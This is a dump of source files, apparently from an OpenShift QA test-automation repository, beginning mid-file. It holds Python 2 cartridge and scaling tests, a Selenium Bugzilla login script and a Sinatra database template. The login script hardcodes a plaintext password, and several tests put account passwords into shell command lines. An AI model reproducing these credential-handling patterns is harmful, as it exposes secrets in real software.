OpenShiftTestSuite(conf)\n suite.add_test(AddControlRemoveMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6377473473548889, "alphanum_fraction": 0.6537290811538696, "avg_line_length": 31.04878044128418, "blob_id": "f831d3883b36431095254c4a2f57d0461c3cd310", "content_id": "02a55411eed9a000679be6a5283a4c25071fa9c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 65, "num_lines": 41, "path": "/automation/open/testmodules/UI/web/US1797_135720.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135720(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n \n def test_u_s1797135720(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.delete_sshkey(self, \"default\")\n (priv, pub) = baseutils.gen_sshkey()\n key_name = \"key\"+baseutils.get_random_str(3)\n baseutils.add_sshkey(self, key_name, pub)\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5961775183677673, "alphanum_fraction": 0.6077607870101929, "avg_line_length": 64.4644546508789, "blob_id": "a252eb1e71b643a8488c7f16720ec36a8486087c", "content_id": "bbac9edad4bf4b8b59bf784b4e3278a942f80060", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13813, "license_type": "no_license", "max_line_length": 595, "num_lines": 211, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_mysql_existing_scalable_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nJun 27, 2012\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbossas-7 app\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbosseap-6.0 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable php-5.3 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable perl-5.10 app\n[US2005][RT]Snapshot and restore MySQL data to existing scalable python-2.6 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.8 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.9 app\n[US2007][RT]Snapshot and restore MySQL data to existing scalable nodejs-0.6 app\n\"\"\"\nimport common, testcase, OSConf\nimport rhtest\nimport subprocess, commands\nimport re, os, time\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'INT', 'STG']\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n self.steps_list = []\n self.summary = \"\"\"[US2003][RT]Snapshot and restore MySQL data to existing scalable jbossas-7 app\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbosseap-6.0 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable php-5.3 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable perl-5.10 app\n[US2005][RT]Snapshot and restore MySQL data to existing scalable python-2.6 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.8 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.9 app\n[US2007][RT]Snapshot and restore MySQL data to existing scalable nodejs-0.6 app\"\"\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = \"ruby\"\n self.domain_name = common.get_domain_name()\n self.app_name = \"snapshot\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMysqlScalableTest(OpenShiftTest):\n\n def modify_app(self):\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n cmd = \"cd '%s/src/main/webapp/' && cp '%s/app_template/bigdata/mysql/mysql.jsp' . && mkdir WEB-INF/lib && cp '%s/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"python\":\n cmd = \"cd '%s/wsgi/' && cp '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"python-2.7\":\n cmd = \"cd '%s/wsgi/' && cp -f '%s/app_template/bigdata/mysql/application27' application && sed -i -e \\\"s/#\\s*'MySQL-python',/'MySQL-python',/g\\\" ../setup.py && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR)\n elif self.test_variant == \"php\":\n cmd = \"cd '%s/php/' && cp '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"perl\":\n cmd = \"cd '%s/perl/' && cp '%s/app_template/bigdata/mysql/mysql.pl' . && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"nodejs\":\n cmd = \"cd '%s/' && cp '%s/app_template/bigdata/mysql/server.js' . && sed -i -e 's/#host/%s/g' server.js && sed -i -e 's/#port/%s/g' server.js && sed -i -e 's/#dbname/%s/g' server.js && sed -i -e 's/#user/%s/g' server.js && sed -i -e 's/#passwd/%s/g' server.js && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"ruby\" or self.test_variant == \"ruby-1.9\":\n cmd = \"cd '%s/' && cp %s/app_template/bigdata/mysql/{config.ru,Gemfile} . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n (ret, output) = common.command_getstatusoutput(cmd)\n return ret\n\n def insert_data(self, size):\n self.app_url = OSConf.get_app_url(self.app_name)\n size = str(size)\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=insert&size=%s\" % (size),\n \"python\" : \"/insert?size=%s\" % (size),\n \"php\" : \"/mysql.php?action=insert&size=%s\" % (size),\n \"perl\" : \"/mysql.pl?action=insert&size=%s\" % (size),\n \"nodejs\" : \"/insert?size=%s\" % (size),\n \"ruby\" : \"/mysql?action=insert&size=%s\" % (size),\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, \"%s records have been inserted into mysql\" % (size), \"-H 'Pragma: no-cache' -L\", 5, 8)\n return ret\n\n def delete_data(self):\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=delete\",\n \"python\" : \"/delete\",\n \"php\" : \"/mysql.php?action=delete\",\n \"perl\" : \"/mysql.pl?action=delete\",\n \"nodejs\" : \"/delete\",\n \"ruby\" : \"/mysql?action=delete\",\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, \"All the records have been deleted from mysql database\", \"-H 'Pragma: no-cache' -L\", 5, 8)\n return ret\n\n def check_data(self, regex):\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=show\",\n \"python\" : \"/show\",\n \"php\" : \"/mysql.php?action=show\",\n \"perl\" : \"/mysql.pl?action=show\",\n \"nodejs\" : \"/show\",\n \"ruby\" : \"/mysql?action=show\",\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, regex, \"-H 'Pragma: no-cache' -L\", 5, 8, True)\n return ret\n \n\n def test_method(self):\n size = 10\n # 1. Create app\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.test_variant, self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Embed mysql to it\n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to it\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql should be embedded successfully\",\n expect_return=0))\n # 3. Copy the sample app to git repo and git push\n self.steps_list.append(testcase.TestCaseStep(\"Copy the sample app to git repo and git push\",\n self.modify_app,\n expect_description=\"The git repo should be modified and git push\",\n expect_return=0))\n # 4. Visit the 'insert' page to insert data into mysql\n self.steps_list.append(testcase.TestCaseStep(\"Visit the 'insert' page to insert data into mysql\",\n self.insert_data,\n function_parameters=[size],\n expect_description=\"The data should be inserted into mysql\",\n expect_return=0))\n # 5. Check the data has been inserted\n self.steps_list.append(testcase.TestCaseStep(\"Check the data has been inserted\",\n self.check_data,\n function_parameters=[[r\"There are \\d+ records in database\", r\"This is testing data for testing snapshoting and restoring big data in mysql database\"],],\n expect_description=\"The data should be inserted into mysql\",\n expect_return=0))\n # 6. Save snapshot of the app\n self.steps_list.append(testcase.TestCaseStep(\"Save snapshot of the app\",\n \"rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"Snapshot should be saved\",\n expect_return=0))\n # 7.Delete the data \n self.steps_list.append(testcase.TestCaseStep(\"Delete the data\",\n self.delete_data,\n expect_description=\"The data in mysql database should be deleted\",\n expect_return=0))\n # 8. Check the data has been deleted\n self.steps_list.append(testcase.TestCaseStep(\"Check the data has been deleted\",\n self.check_data,\n function_parameters=[\"There is no record in database\",],\n expect_description=\"The data should be deleted from mysql\",\n expect_return=0))\n # 9. Use the tarball to restore the app\n self.steps_list.append(testcase.TestCaseStep(\"Use the tarball to restore the app\",\n \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The data should be restored\",\n expect_return=0))\n # 10. Check the data to see if it's restored\n self.steps_list.append(testcase.TestCaseStep(\"Check the data to see if it's restored\",\n self.check_data,\n function_parameters=[[\"There are \\d+ records in database\", \"This is testing data for testing snapshoting and restoring big data in mysql database\"],],\n expect_description=\"The data should be restored\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlScalableTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5476034283638, "alphanum_fraction": 0.5505580902099609, "avg_line_length": 30.081632614135742, "blob_id": "73f488d03a828435b51b3a6662a74f6dda4c5b7f", "content_id": "74c3ed20121e72100ba72b1c47c2d324daf3cb0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/automation/open/testmodules/RT/perf/perf.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport uuid\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.instance_ip = self.config.instance_info['ip']\n self.rest = openshift.Openshift(host=self.instance_ip)\n self.perf_results = {}\n \n def finalize(self):\n pass\n \n def record_results(self, resid):\n for k, v in self.perf_results.items():\n print \"K: %s, V: %s\" % (k,v)\n #action = database.get_perf_action_id(k)\n res = database.PerfResults(TestResultsID=resid, ActionID=k, \n ActionTime=v[0], GearSize=v[1])\n print res.id\n\n\nclass Performance(OpenShiftTest):\n def test_method(self):\n errorCount = 0\n li = self.rest\n #self.info(\"xxx\", 1)\n #perf_results = {}\n # setup a valid domain first\n #print \"###########################\"\n self.info(\"Domain performance\")\n domain_name = \"test%s\" % uuid.uuid1().hex[:6]\n action = 'domain_create'\n method_call = getattr(li, action)\n manifest_id = database.get_perf_action_id(action, None)\n status, res = method_call(domain_name)\n self.perf_results[manifest_id] = res\n\n app_params_dict = self.config.app_params\n app_params = openshift.sortedDict(app_params_dict)\n for cart in self.config.cart_types:\n for action in app_params:\n manifest_id = database.get_perf_action_id(action['name'], cart)\n #perf_results[mainfest_id] = None\n method_call = getattr(li, action['name'])\n k, v = action['params'].items()[0]\n if action['name'] == 'app_create':\n status, res = method_call(v, cart)\n elif action['name'] == 'app_create_scale':\n status, res = method_call(v, cart, 'true')\n else:\n status, res = method_call(v)\n # finally get the gear information\n try:\n gear_info, gear_size = li.get_gears(v)\n except:\n gear_size = 1\n self.perf_results[manifest_id] = [res, gear_size]\n #self.info(\"xx\", 1)\n \"\"\"\n action = 'domain_delete'\n method_call = getattr(li, action)\n manifest_id = database.get_perf_action_id(action, None)\n status, res = method_call(domain_name)\n self.perf_results[manifest_id] = res\n \n \"\"\"\n\n if errorCount:\n return self.failed(\"Performance test failed.\")\n else:\n return self.passed(\"Performance test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Performance)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6450130939483643, "alphanum_fraction": 0.6502624750137329, "avg_line_length": 25.736841201782227, "blob_id": "aab88213b2449807ff1f77f9acba70ea0850f14d", "content_id": "c3c2b35548111717b8e464b075c81cf51f9f5a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1524, "license_type": "no_license", "max_line_length": 214, "num_lines": 57, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/rack/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\nrequire 'pg'\n\nBundler.require\n\n#conn_str = \"dbname=#pgsql_dbname# user=#pgsql_user# password=#pgsql_passwd# host=#pgsql_host# port=#pgsql_port#\"\n\nconn_str = \"dbname=#{ENV['OPENSHIFT_APP_NAME']} user=#{ENV['OPENSHIFT_POSTGRESQL_DB_USERNAME']} password=#{ENV['OPENSHIFT_POSTGRESQL_DB_PASSWORD']} host=#{ENV['OPENSHIFT_POSTGRESQL_DB_HOST']} port=#{ENV['OPENSHIFT_POSTGRESQL_DB_PORT']}\"\n\nget '/' do\n \"the time where this server lives is #{Time.now}\n <br /><br />check out your <a href=\\\"/agent\\\"> user_agent</a>\"\nend\n\nget '/show.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"SELECT data from info;\")\n response_body = res.getvalue(0,0)\n conn.finish()\n end\n\n \"#{response_body}\"\nend\n\nget '/data1.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"DROP TABLE IF EXISTS info;\")\n res = conn.exec(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n res = conn.exec(\"INSERT INTO info VALUES(1, '#str_random1#');\")\n response_body = \"Please visit /show.rb to see the data\"\n conn.finish()\n end\n\n \"#{response_body}\"\nend\n\nget '/data2.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"DROP TABLE IF EXISTS info;\")\n res = conn.exec(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n res = conn.exec(\"INSERT INTO info VALUES(1, '#str_random2#');\")\n response_body = \"Please visit /show.rb to see the data\"\n conn.finish()\n end \n\n \"#{response_body}\"\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6729622483253479, "alphanum_fraction": 0.6729622483253479, "avg_line_length": 27.742856979370117, "blob_id": "777b35ad197a2184268fc3b0b5c2d04366ce54a0", "content_id": "af8078d875193f84fb6285734e0e2e4cb7b13d5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/automation/open/testmodules/RT/quick_start/quick_start_django.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartDjango(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"python\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: django\"\n self.config.git_upstream_url = \"git://github.com/openshift/django-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Yeah Django!\"\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDjango)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5972023010253906, "alphanum_fraction": 0.6083213686943054, "avg_line_length": 33.407405853271484, "blob_id": "0acb358f4fe55234742c2d9ceedb31d2234526fa", "content_id": "bbb7fd0bca1c6ea968be2b3d251de38334ff1272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 209, "num_lines": 81, "path": "/automation/open/testmodules/RT/cartridge/php_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]PHP Framework Support\nhttps://tcms.engineering.redhat.com/case/122283/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[rhc-cartridge]PHP Framework Support\"\n self.app_name = \"phpframework\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = \"./%s\" % (self.app_name)\n tcms_testcase_id=122283\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PhpFrameworkSupport(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an php app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Make some changes to the git repo\n self.steps_list.append(testcase.TestCaseStep(\"2.Make some changes to the git repo\",\n \"rm -rf %s/php/index.php && cp -f %s/app_template/php.template %s/php/index.php && cd %s && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo),\n expect_description=\"Git repo successfully modified\",\n expect_return=0))\n\n # 3.Check app via browser\n test_html = \"The Times-Tables\"\n \n self.steps_list.append(testcase.TestCaseStep(\"3.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PhpFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7412541508674622, "alphanum_fraction": 0.7498349547386169, "avg_line_length": 34.20930099487305, "blob_id": "9a320111f76a81c4a1af133d8b6dc1bfb1d79b8c", "content_id": "41016a67434871501339ed33046c8e9ac99b2fc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 107, "num_lines": 43, "path": "/automation/webexample.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ntest_env = 'https://bzweb01-qe.app.eng.rdu.redhat.com/'\ndev_env = 'https://bzweb01-devel.app.eng.rdu.redhat.com/'\n\nusername = '[email protected]'\npwd = 'redhat'\n\ndriver = webdriver.Firefox()\ndriver.get(dev_env)\ndriver.maximize_window()\n\nlogin_link_id = 'login_link_top'\nlogin_user_input_id = 'Bugzilla_login_top'\nlogin_user_pwd_id = 'Bugzilla_password_top'\nadmin_link_text = 'Administration'\nadmin_link_xpath = '//div/ul/li[11]/a'\nadmin_link_css = '#header ul li a[href=\"admin.cgi\"]'\n#css: html body.bzweb01-qe-app-eng-rdu-redhat-com div#header ul.links li a\n#or: html body.bzweb01-qe-app-eng-rdu-redhat-com div#footer ul#useful-links li#links-actions ul.links li a\n\nlogin_link = driver.find_element(by=By.ID, value=login_link_id)\nlogin_user_input = driver.find_element(by=By.ID, value=login_user_input_id)\nlogin_user_pwd = driver.find_element(by=By.ID, value=login_user_pwd_id)\n\nlogin_link.click()\n\nlogin_user_input.send_keys(username)\nlogin_user_pwd.send_keys(pwd)\nlogin_user_pwd.send_keys(Keys.RETURN)\n\n#admin_link = driver.find_element(By.LINK_TEXT, admin_link_text)\n#import time\n#time.sleep(5)\nWebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.XPATH, admin_link_xpath)))\nadmin_link = driver.find_element(By.XPATH, admin_link_xpath)\nadmin_link.click()\n\n" }, { "alpha_fraction": 0.6063321232795715, "alphanum_fraction": 0.6135005950927734, "avg_line_length": 30.58490562438965, "blob_id": "8725da9d3a9770145b68f19aca91f1325276db19", "content_id": "4f47f705fb74c892048de7fccc94743659b2ecd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1674, "license_type": "no_license", "max_line_length": 116, "num_lines": 53, "path": "/automation/open/testmodules/RT/hot_deploy/python_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 24, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport fileinput\nimport re\nfrom hot_deploy_test import HotDeployTest\n\nclass PythonHotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['python']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2747][RT]Hot deployment support for application - without Jenkins - python-2.6\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid\"\n self.info(\"Editing file '%s'...\" % 'wsgi/application')\n try:\n for line in fileinput.input(\"./%s/wsgi/application\" % ( self.config.application_name ), inplace = True):\n if re.search(r'if environ.+PATH_INFO.+/env.+:', line):\n print \"\\tif environ['PATH_INFO'] == '/pid':\"\n print \"\\t\\tresponse_body = str(os.getppid())\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5846632719039917, "alphanum_fraction": 0.5891397595405579, "avg_line_length": 32.58169937133789, "blob_id": "fb8130864b56fae301e7965a441222072dd04038", "content_id": "7da098693f5d3fa6843fc7db1c4ece0bf394ee5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5138, "license_type": "no_license", "max_line_length": 129, "num_lines": 153, "path": "/automation/open/testmodules/RT/scaling/negative_scaling1.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.test_variant=self.config.test_variant\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.domain_name = common.get_domain_name()\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=141096\n try:\n os.putenv('https_proxy', os.environ['http_proxy'])\n except:\n pass\n 